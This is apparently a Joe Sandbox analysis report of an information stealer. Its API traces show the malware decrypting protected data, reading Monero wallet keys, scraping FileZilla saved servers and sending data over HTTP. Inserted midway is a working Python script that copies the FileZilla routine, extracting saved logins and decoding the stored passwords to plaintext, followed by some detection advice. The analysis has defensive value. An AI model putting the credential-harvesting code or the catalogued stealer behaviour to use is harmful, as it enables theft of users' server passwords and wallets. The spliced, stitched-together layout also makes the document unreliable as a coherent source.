                        • Instruction Fuzzy Hash: 7BB217F360C2009FE304AE2DEC8567ABBE5EF94720F1A492DE6C4C7744EA3598458797
                        APIs
                        • CoCreateInstance.COMBASE(005DE118,00000000,00000001,005DE108,00000000), ref: 005D3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005D37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 01345a7c1b2fb427954e0007519c16e93352d700dec0d122fcf7e9f27cd36283
                        • Instruction ID: 1f3f14c79bbb8ee7da029333cbdf487a26328f5cdd5276a2d3a1141f39c83f1e
                        • Opcode Fuzzy Hash: 01345a7c1b2fb427954e0007519c16e93352d700dec0d122fcf7e9f27cd36283
                        • Instruction Fuzzy Hash: 2841F971A00A189FDB24DB58CC95B9BB7B4BB48702F4081D9E608EB2D0E7716EC5CF51
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005C9B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 005C9BA3
                        • LocalFree.KERNEL32(?), ref: 005C9BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: f697e6200aecfde99294a551fb3321ee91d5d6878fba47c11f2e91f150b5787a
                        • Instruction ID: cfc2af688473a9793e100a7bb871fe3a1e785bfd5f21f186db5558089ebcf75a
                        • Opcode Fuzzy Hash: f697e6200aecfde99294a551fb3321ee91d5d6878fba47c11f2e91f150b5787a
                        • Instruction Fuzzy Hash: 3D11C9B8A00209EFDB04DF94D989EAE77B5FF88304F104598E915A7350D770AE10CFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +#-$E=_;
                        • API String ID: 0-3180536403
                        • Opcode ID: 7e52ad91c6bb3b4442ca197874440d827afddd21105add7404834e004ff57ae8
                        • Instruction ID: a762ce548e9cbda1963896a7e8d73e67fbc9b36c22f761833f1049d8bddf75a2
                        • Opcode Fuzzy Hash: 7e52ad91c6bb3b4442ca197874440d827afddd21105add7404834e004ff57ae8
                        • Instruction Fuzzy Hash: E1B218F360C2009FE7046E2DEC8567ABBE9EF94720F1A4A3DE6C4C7744E63598058657
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: g?|$k?e#
                        • API String ID: 0-1641547115
                        • Opcode ID: 2d5b9edfb0e264116dd141f8c52eca0339009050721b31ec7b4fc88b376bec24
                        • Instruction ID: 283155604507ae2f87f49bd674233464a40955f870903a82ef3bf38d4ff76251
                        • Opcode Fuzzy Hash: 2d5b9edfb0e264116dd141f8c52eca0339009050721b31ec7b4fc88b376bec24
                        • Instruction Fuzzy Hash: B74139B3A0C7049BF314A92DEC89766B7D6DBD4320F2A463DDA84D7785E93998018285
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: m4m_
                        • API String ID: 0-3773686785
                        • Opcode ID: 77cc00f4e3746892e48f5e9c19b257ee646f6ee03d06e4c04ae1f3198f6dc35f
                        • Instruction ID: 69207bcb4b068ca3b9e4d40ba60b8e4bc6513ac5ef1836d0468e5e48b38c83a5
                        • Opcode Fuzzy Hash: 77cc00f4e3746892e48f5e9c19b257ee646f6ee03d06e4c04ae1f3198f6dc35f
                        • Instruction Fuzzy Hash: 627126F3A186045FF3086E2CEC5177AB7DADB94320F1A453DEA89D3784E9795C0482D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: `ww^
                        • API String ID: 0-2809251080
                        • Opcode ID: c4fc57ac6d9f6b91b2f036d4214b5ad06a947ecfbd3a299f3fe569ee72faf5a6
                        • Instruction ID: 5ac6fa3c156ca10a1c6f09aa256498ed2b8b57fe824e776ad9a9bd47f6005640
                        • Opcode Fuzzy Hash: c4fc57ac6d9f6b91b2f036d4214b5ad06a947ecfbd3a299f3fe569ee72faf5a6
                        • Instruction Fuzzy Hash: A57106B39087149BE3046E39DC8576AF7E6EFD4720F16893DE6C4C3744E63958418B82
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: H;mW
                        • API String ID: 0-1921414146
                        • Opcode ID: 1312c2b73b59656d244ae6b2e2caa062affd68056e48a697fa8af36abcb6c1a7
                        • Instruction ID: afe98c0b2a67ae5b8fec00629a2e1f609429a1e7f043acb9993ca012fbe96615
                        • Opcode Fuzzy Hash: 1312c2b73b59656d244ae6b2e2caa062affd68056e48a697fa8af36abcb6c1a7
                        • Instruction Fuzzy Hash: B4615AF3A182105FF708593CEC9A77A76D5EB44324F1A0A3EEAC5D77C4E9698C018296
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: yvmo
                        • API String ID: 0-1783713227
                        • Opcode ID: dd78634ffdbbdb39a4770288781015f5f9f88d9bdff10ddf79e185384a48bd35
                        • Instruction ID: 4e7ea9f03ce68837f6ae13afe44aeb420f47962d12898114b8d3974110f8bcc1
                        • Opcode Fuzzy Hash: dd78634ffdbbdb39a4770288781015f5f9f88d9bdff10ddf79e185384a48bd35
                        • Instruction Fuzzy Hash: 6F515BF7E482141BF304A97EDC84726B6CB9BE4720F2EC239EA54D7758F87958064192
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 663374ba5146c596184b9f4386b24de0c608d656e0818d59b795f71dcd521ff1
                        • Instruction ID: 5df6265a7e6bfa0dc9a8ba134e53dfa3b3539d067304c45f69d6cc43c5b29c7a
                        • Opcode Fuzzy Hash: 663374ba5146c596184b9f4386b24de0c608d656e0818d59b795f71dcd521ff1
                        • Instruction Fuzzy Hash: 645126F39196145FF3049A28DD8477AB6DADBD4320F2A8A3DE6D4C7784E93C48058686
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f2dd2e583364ecbd91e603f50dc84e533a1bc2025dfe59ba6a22380052e75352
                        • Instruction ID: 59493a7b6b594f005ecc7d66e1c8362f99fe4e35319247b2ff85e5248714abe5
                        • Opcode Fuzzy Hash: f2dd2e583364ecbd91e603f50dc84e533a1bc2025dfe59ba6a22380052e75352
                        • Instruction Fuzzy Hash: 325139B3A593149BE310797CDC847BBFBD5EB94320F2B853DDAC493780E93958054296
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6dfd64b263b067bb3243fac03051cbaf83bf6dbd0c2170333187094f257c08da
                        • Instruction ID: 63604d5a6e868c39eea3f98e7eaca8b517494e06c8b5342b35e361a9a379cc6a
                        • Opcode Fuzzy Hash: 6dfd64b263b067bb3243fac03051cbaf83bf6dbd0c2170333187094f257c08da
                        • Instruction Fuzzy Hash: 8B3103B240C704DFE311BF2AD8856AAFBE5FF98310F12892DDAE583614D674A444CB97
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,005E0DBA,005E0DB7,005E0DB6,005E0DB3), ref: 005D0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 005D0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 005D03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 005D0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 005D0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 005D0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 005D0571
                        • lstrcat.KERNEL32(?,url: ), ref: 005D0580
                        • lstrcat.KERNEL32(?,00000000), ref: 005D0593
                        • lstrcat.KERNEL32(?,005E1678), ref: 005D05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 005D05B5
                        • lstrcat.KERNEL32(?,005E167C), ref: 005D05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 005D05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 005D05E6
                        • lstrcat.KERNEL32(?,005E1688), ref: 005D05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 005D0604
                        • lstrcat.KERNEL32(?,00000000), ref: 005D0617
                        • lstrcat.KERNEL32(?,005E1698), ref: 005D0626
                        • lstrcat.KERNEL32(?,005E169C), ref: 005D0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 9f1cefd74fa062898847578ffc1889e626c1d3359842ec91676a6f574f0a2e2a
                        • Instruction ID: a0b8175252deeac3b991fdd994f52b5a444cc5ef691e1741ef7c84d8459f8a4c
                        • Opcode Fuzzy Hash: 9f1cefd74fa062898847578ffc1889e626c1d3359842ec91676a6f574f0a2e2a
                        • Instruction Fuzzy Hash: 8FD188719002499BCB18FBF8CD8AEEE7B38FF54300F40851AF502A6291DF74AA45DB65
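The API trace above is the FileZilla credential harvesting routine: the sample resolves a profile folder with SHGetFolderPathA, reads \AppData\Roaming\FileZilla\recentservers.xml through CreateFileA/GetFileSizeEx/ReadFile, locates <Host>, <Port>, <User> and <Pass encoding="base64"> by plain substring search (StrStrA) rather than with an XML parser, and concatenates the result under the labels browser: FileZilla, profile: null, url:, login: and password:. The Python below is an added example, not code from the sample or from Joe Sandbox, that replicates that parsing over a constructed recentservers.xml so the exposure is concrete: FileZilla keeps saved passwords base64-encoded rather than encrypted unless a master password has been configured. The sample XML is invented, and the ':' between host and port and the newline between lines are assumptions; the report does not show the separator constants at 005E1678, 005E167C, 005E1688, 005E1698 and 005E169C.

```python
"""Replicates the recentservers.xml parsing visible in the API trace.

Added example: the parsing mirrors the StrStrA markers seen in the report,
the sample XML below is constructed, and the record separators are assumed.
"""
import base64
import re
from typing import Dict, List, Optional

# Constructed stand-in for %APPDATA%\FileZilla\recentservers.xml. The layout
# follows FileZilla 3's format; every value is invented for this example.
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.1" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.net</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>alice</User>
      <Pass encoding="base64">cGFzc3dvcmQxMjM=</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.org</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>anonymous</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""

# The four markers the binary locates with StrStrA (see the API list above).
MARKERS = {
    "host": "<Host>",
    "port": "<Port>",
    "user": "<User>",
    "pass": '<Pass encoding="base64">',
}

_SERVER_RE = re.compile(r"<Server>(.*?)</Server>", re.DOTALL)


def _value_after(marker: str, blob: str) -> Optional[str]:
    """StrStrA-style lookup: find the marker, take the text up to the next '<'."""
    i = blob.find(marker)
    if i < 0:
        return None
    i += len(marker)
    j = blob.find("<", i)
    return blob[i:j] if j >= 0 else blob[i:]


def extract_filezilla_servers(xml_text: str) -> List[Dict[str, Optional[str]]]:
    """One record per <Server>, with the base64 password decoded.

    The search is scoped to each <Server> element on purpose: a flat StrStrA
    scan over the whole file would pair an anonymous entry (no <Pass>) with
    the password of the server that follows it.
    """
    records = []
    for match in _SERVER_RE.finditer(xml_text):
        block = match.group(1)
        rec = {key: _value_after(marker, block) for key, marker in MARKERS.items()}
        if rec["pass"] is not None:
            # base64 is an encoding, not encryption: one call recovers the secret.
            rec["pass"] = base64.b64decode(rec["pass"]).decode("utf-8", "replace")
        records.append(rec)
    return records


def format_record(rec: Dict[str, Optional[str]]) -> str:
    """Lay the fields out under the labels the report shows being lstrcat'd.

    The ':' host/port separator and the line breaks are assumptions; the
    constants the sample concatenates between fields are not in the report.
    """
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host'] or ''}:{rec['port'] or ''}\n"
        f"login: {rec['user'] or ''}\n"
        f"password: {rec['pass'] or ''}\n"
    )


def main() -> None:
    for rec in extract_filezilla_servers(SAMPLE_RECENTSERVERS_XML):
        print(format_record(rec))


if __name__ == "__main__":
    main()
```

Running the script prints one record per server; the second, anonymous entry comes out with an empty password instead of inheriting the first server's secret, which is the edge case a naive whole-file StrStrA scan gets wrong. For defenders, the practical takeaway is that any process other than filezilla.exe opening recentservers.xml or sitemanager.xml for read is worth alerting on, and that enabling FileZilla's master password is the only thing that stops this routine from recovering plaintext.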
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                          • Part of subcall function 005C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005C59F8
                        • StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C5A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C5B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,014B0E50,00000000,?,014AF840,00000000,?,005E1A1C), ref: 005C5E71
                        • lstrlen.KERNEL32(00000000), ref: 005C5E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005C5E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C5E9A
                        • lstrlen.KERNEL32(00000000), ref: 005C5EAF
                        • lstrlen.KERNEL32(00000000), ref: 005C5ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005C5EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 005C5F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005C5F2F
